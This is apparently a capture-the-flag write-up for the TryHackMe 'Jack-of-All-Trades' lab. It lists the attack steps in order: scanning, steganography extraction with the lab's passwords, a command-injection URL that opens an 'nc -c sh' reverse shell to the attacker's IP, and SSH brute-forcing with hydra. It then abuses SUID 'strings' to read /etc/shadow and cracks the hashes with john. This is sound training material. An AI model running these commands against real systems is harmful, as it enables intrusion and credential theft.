Jack-of-All-Trades

Room Link: https://tryhackme.com/room/jackofalltrades

Initial Scan

For some reason they switched port 22 with http site and 80 with ssh

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/22 - HTTP

gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Had to all the override to see the site on port 22 in firefox

There is a stegosaurus picture on the home page so it is hinting that there's something in one of the pictures, eventually we find jackinthebox username and password in one of the pictures.

Kali

steghide extract -sf stego.jpg 
Password: u?WtKSraq

steghide extract -sf header.jpg  
Password: u?WtKSraq

If you run a command like this you can't see the results unless you view the source.

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali

nc -lvnp 1337

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

In the home directory there is a password list, it's small enough so I copied and pasted into a file on Kali.

Kali

hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh

Kali

ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@

PSPY

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

cd /tmp
wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 

Strings as the SUID-bit set which means we can run it against files we normally wouldn't be able to read. I tried getting roots password but it was taking too long.

Victim

find / -perm -u=s -type f 2> /dev/null 
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd

Kali

unshadow passwd shadow > passwords.txt 
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I just ended up using strings to read the root.txt

Kali

/usr/bin/strings /root/root.txt